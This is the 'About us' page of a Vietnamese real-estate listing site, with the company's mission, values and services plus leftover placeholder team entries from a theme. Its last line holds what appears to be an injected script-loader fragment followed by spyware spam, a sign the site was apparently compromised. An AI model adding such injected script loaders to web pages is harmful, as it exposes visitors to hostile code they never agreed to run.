Price Range: From to

Compare Listings

Thitruongcanho.net là cổng thông tin và giao dịch nhà đất trực tuyến hàng đầu Việt Nam hiện nay dành cho cá nhân, doanh nghiệp mua bán, kinh doanh và tìm kiếm thông tin trên thị trường bất động sản và các lĩnh vực liên quan.

Với nhiệm vụ cập nhật và cung cấp thông tin xác thực nhất từ các chủ đầu tư cũng như các nhà phân phối chính. Thị trường căn hộ đã không ngừng hoàn thiện, cải tiến nhằm phát triển các dự án Bất Động Sản vì mục tiêu an sinh xã hội, đáp ứng tối đa nhu cầu an cư và đầu tư của khách hàng cũng như góp phần tạo dựng hình ảnh của đơn vị chủ đầu tư dự án đối với thị trường qua chính sách marketing chuyên nghiệp. Đặc biệt Thị trường căn hộ mong muốn mang lại cho khách hàng và nhà đầu tư những giá trị an cư và đầu tư tốt nhất thông qua khẩu hiệu “An cư lâu dài-đầu tư vững chãi”.

Ngoài việc kế thừa các giá trị mà Thị trường bất động sản đã tạo ra, Thitruongcanho.net còn tập trung vào 3 yếu tố: Tâm, Tín và Kiên.

  • Tâm: Hoạt động trên nền tảng mối quan hệ giữa con người với con người trong nội bộ công ty, giữa công ty với khách hàng và trách nhiệm với xã hội. Tâm huyết với mỗi dự án, sản phẩm dịch vụ mang đến cho thị trường và khách hàng, luôn cam kết tạo những giá trị bền vững tốt nhất
  • Tín: Lãnh đạo có uy tín đối với nhân viên tạo nên 1 tập thể vững mạnh, đoàn kết và đồng lòng vì mục tiêu phát triển chung của toàn công ty và hệ thống. Uy tín với khách hàng đối với những sản phẩm, dịch vụ mang đến cho khách hàng, tạo được sự tín nhiệm đối với khách hàng thông qua những cơ hội an cư và đầu tư vững chắc
  • Kiên: Luôn kiên định với những mục tiêu đã đề ra, đặc biệt là luôn lắng nghe nhu cầu của khách hàng và đặt lợi ích của khách hàng lên trên hết. Kiên trì, bản lĩnh trước những khó khăn và thử thách, sáng tạo và nỗ lực không ngừng nhằm tạo ra những giá trị tốt nhất

Hiện tại, Thị trường căn hộ chúng tôi có một đội ngũ nhân sự trẻ với độ tuổi bình quân là 25, đây là yếu tố quan trọng trong quá trình phát triển của Doanh nghiệp vốn rất chú trọng vào yếu tố con người. Đồng thời công ty cũng không ngừng mở các khóa đào tạo nâng cao kỹ năng cho nhân viên nhằm phục vụ tốt hơn nhu cầu ngày càng cao của khách hàng.

Phấn đấu trong vòng 1 năm sẽ trở thành đơn vị dẫn đầu về thị trường căn hộ tại TP HCM, Thitruongcanho.net sẽ tiếp tục hoàn thiện và mở rộng thị trường sang các khu vực và thị trường mới như Cần Thơ, Long An, Vũng Tàu, Đà Nẵng… đảm bảo mục tiêu trong 3 năm tới Website Thitruongcanho.net trở thành thương hiệu quốc gia và phát triển lên tầm quốc tế.

Các dịch vụ của chúng tôi

– Luôn cập nhật thông tin mới nhất
– Đăng thông tin quản cáo nhà đất uy tín và trung thực
– Đăng banner quảng cáo
– Đăng bài PR quảng bá sản phẩm, dịch vụ
– Trực Web 24/7 để tư vấn chính xác thông tin cho khách hàng

Meet our team

agent-3

Martin Moore
Executive Director

Debra-Rose_avatar_1434742307

Emily Austin
Marketing Director

agent-2

Donna Reed
Customer Care

agent-4

Russell Price
Creative Director

Houzez was built with your success in mind

Get more calls, schedule more viewings and earn more commissions

…and many other cool features…

var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);The most popular 2017 spy software applications for the mobile phones.